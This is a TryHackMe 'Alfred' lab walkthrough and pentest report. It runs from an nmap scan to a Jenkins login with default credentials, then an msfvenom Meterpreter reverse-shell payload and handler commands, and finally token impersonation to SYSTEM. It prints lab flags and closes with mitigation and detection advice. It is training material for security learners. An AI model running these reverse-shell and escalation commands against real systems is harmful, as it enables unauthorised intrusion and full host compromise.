## https://sploitus.com/exploit?id=0A2230D0-E734-5EAE-9149-EDFB7EBE2C8F
# ๐ฆ TryHackMe: Alfred Walkthrough & Penetration Testing Report
---
## ๐ Table of Contents
- [Overview](#-overview)
- [Objectives](#-objectives)
- [Attack Path Summary](#-attack-path-summary)
- [Vulnerability Findings](#-vulnerability-findings)
- [Step-by-Step Walkthrough](#-step-by-step-walkthrough)
- [1. Reconnaissance](#1-reconnaissance)
- [2. Jenkins Enumeration](#2-jenkins-enumeration)
- [3. Initial Access](#3-initial-access)
- [4. Privilege Escalation](#4-privilege-escalation)
- [How to Reproduce](#-how-to-reproduce)
- [Detection & Mitigation](#-detection--mitigation)
- [Lessons Learned](#-lessons-learned)
- [References](#-references)
- [Disclaimer](#-disclaimer)
---
## ๐ฏ Overview
**Alfred** is a Windows-based TryHackMe room named after Batman's loyal butler. It focuses on identifying misconfigured CI/CD pipelines (Jenkins) and abusing Windows token privileges (`SeImpersonatePrivilege`) to achieve full system compromise. This repository documents the complete attack path from external reconnaissance to `NT AUTHORITY\SYSTEM`.
---
## ๐ Objectives
- Perform comprehensive external enumeration to identify vulnerable services.
- Exploit default credentials on an exposed Jenkins automation server.
- Establish a reliable Meterpreter reverse shell.
- Enumerate Windows token privileges and abuse `SeImpersonatePrivilege` for vertical privilege escalation.
- Document actionable defensive recommendations to secure similar infrastructure.
---
## โ๏ธ Attack Path Summary (Kill-Chain)
1. **Reconnaissance:** Identified an exposed Jenkins service on port 8080 and an unpatched RDP service (MS12-020).
2. **Initial Access:** Bypassed authentication using default Jenkins credentials (`admin:admin`).
3. **Execution:** Leveraged Jenkins' "Execute Windows batch command" feature to download and execute a PowerShell reverse shell (Nishang).
4. **Privilege Escalation:** Identified `SeImpersonatePrivilege` enabled on the service account.
5. **SYSTEM Access:** Used Metasploit's `incognito` module to impersonate the `BUILTIN\Administrators` token and migrate into `services.exe`.
---
## ๐จ Vulnerability Findings
| Vulnerability | Component | Severity | Description |
| :--- | :--- | :--- | :--- |
| **CVE-2012-0002** | RDP (Port 3389) | **Critical** | MS12-020 Remote Code Execution allowing unauthenticated attackers to execute arbitrary code. |
| **CVE-2012-0152** | RDP (Port 3389) | **High** | MS12-020 Denial of Service flaw allowing attackers to crash the system via crafted packets. |
| **Default Credentials** | Jenkins (Port 8080) | **Critical** | Administrative interface exposed with `admin:admin`, granting RCE via build jobs. |
| **Privilege Misconfiguration** | Windows Tokens | **Critical** | Service account running with `SeImpersonatePrivilege`, leading to immediate SYSTEM escalation. |
---
## ๐ฃ Step-by-Step Walkthrough
1. Reconnaissance
We begin with an `nmap` scan to discover open ports and services on the target.
```bash
nmap 10.112.178.37 -sV -sC --script=vuln -O -Pn
```
**Key Findings:**
- The target is vulnerable to **MS12-020 (CVE-2012-0002)**, an RDP Remote Code Execution vulnerability, and **CVE-2012-0152** (DoS).
- The target exposes a **Jetty 9.4.z-SNAPSHOT** service on port `8080`, running a Jenkins CI/CD server.
Because MS12-020 RCE exploits can be unstable and cause the server to crash (BSOD), we pivot our focus to the Jenkins server for a more reliable foothold.
2. Jenkins Enumeration
Navigating to `http://:8080`, we are presented with the Jenkins login portal.
We successfully bypass authentication using common default credentials:
- **Username:** `admin`
- **Password:** `admin`
With administrative access, we have the ability to execute arbitrary system commands via Jenkins build jobs. We create a new project and configure a build step:
1. Open the project.
2. Click **Configure**.
3. Scroll to the **Build** section and add an **Execute Windows batch command** step.
3. Initial Access
To establish a reverse connection, we generate a Meterpreter payload using `msfvenom` encoded for PowerShell execution.
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.112.116.54 LPORT=4444 -f psh-cmd
```
This generates a payload string that looks like this:
```powershell
powershell.exe -nop -w hidden -e BASE64_PAYLOAD
```
We start a Metasploit listener to catch the callback:
```bash
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.112.116.54; set LPORT 4444; exploit"
```
Output:
```text
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (203846 bytes) to 10.114.178.215
[*] Sending stage (203846 bytes) to 10.114.178.215
meterpreter >
```
We paste the payload into the Jenkins build step and click "Build Now". The reverse shell connects successfully.
**User Flag Extraction:**
```bash
search -f user.txt
```
```text
Found 1 result...
C:\Users\bruce\Desktop\user.txt
```
```bash
cat "C:\Users\bruce\Desktop\user.txt"
```
```text
79007a09481963edf2e1321abd9ae2a0
```
4. Privilege Escalation
Before escalating, we upgrade to a stable Windows executable Meterpreter session to facilitate advanced post-exploitation.
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.114.75.73 LPORT=4443 -f exe -o shell.exe
```
We download and execute this binary, then drop into a system shell to review our Windows token privileges.
```bash
shell
```
```cmd
whoami /priv
```
```text
SeDebugPrivilege Debug programs Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
```
The presence of `SeImpersonatePrivilege` is a critical finding. It allows a process to impersonate any token it can obtain.
We load the `incognito` extension in Metasploit to abuse this privilege:
```bash
load incognito
impersonate_token "BUILTIN\Administrators"
```
Output:
```text
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
```
We are now running as `NT AUTHORITY\SYSTEM`. To solidify persistence and ensure token stability, we migrate our process to `services.exe`.
**Root Flag Extraction:**
```bash
cat "C:\Windows\System32\config\root.txt"
```
```text
dff0f748678f280250f25a45b8046b4a
```
---
## ๐ ๏ธ How to Reproduce
1. Clone this repository.
2. Ensure you have Metasploit and `nmap` installed on your attacking machine.
3. Deploy the TryHackMe Alfred machine.
4. Review the scripts in the `/payloads` directory.
5. Follow the step-by-step walkthrough detailed above.
*(Screenshots and command outputs are available in the `/screenshots` and `/reports` directories).*
---
## ๐ก๏ธ Detection & Mitigation
### Defensive Recommendations:
1. **Change Default Credentials:** Never deploy Jenkins or any CI/CD platform with default credentials (`admin:admin`). Enforce strong password policies and MFA.
2. **Patch Legacy Systems:** The presence of MS12-020 (CVE-2012-0002/0152) indicates a severe lack of patch management. Ensure all internet-facing and internal protocols (like RDP) are updated.
3. **Principle of Least Privilege:** Service accounts running web servers or CI/CD pipelines should **never** be granted `SeImpersonatePrivilege` or `SeDebugPrivilege` unless absolutely strictly required and deeply sandboxed.
4. **Network Segmentation:** Isolate automation pipelines from critical business networks to prevent lateral movement.
### Detection Engineering:
- Monitor for anomalous child processes spawning from `java.exe` (Jenkins), particularly `cmd.exe` or `powershell.exe`.
- Create alerts for execution of encoded PowerShell commands (`powershell.exe -e ...`).
- Monitor token manipulation events (Event ID 4624/4672) involving `SeImpersonatePrivilege`.
---
## ๐ Lessons Learned
- **CI/CD is a Prime Target:** Because build servers inherently execute code by design, compromising them often leads directly to Remote Code Execution. They must be secured with the same rigor as Domain Controllers.
- **Tokens are Keys to the Kingdom:** Understanding Windows Token architecture is crucial for red teamers. A seemingly low-privileged service account can hold the keys to `SYSTEM` if misconfigured.
---
## ๐ References
- [TryHackMe โ Alfred](https://tryhackme.com/room/alfred)
- [Nishang PowerShell Framework](https://github.com/samratashok/nishang)
- [Exploit-DB โ Abusing Token Privileges For LPE](https://www.exploit-db.com/papers/42556)
- [Microsoft Access Tokens Documentation](https://learn.microsoft.com/en-us/windows/win32/secauthz/access-tokens)
---
## ๐ค Author
**Abanoub Ehab** | **BobXploit**
- Offensive Security Researcher & Penetration Tester
- Focused on Red Teaming, Real-world Attack Simulation, and Vulnerability Research.
---
## โ ๏ธ Disclaimer
All information, techniques, and tools documented in this repository are for **educational purposes and authorized penetration testing only**. The author is not responsible for any misuse of this information. Always obtain explicit permission before testing any system.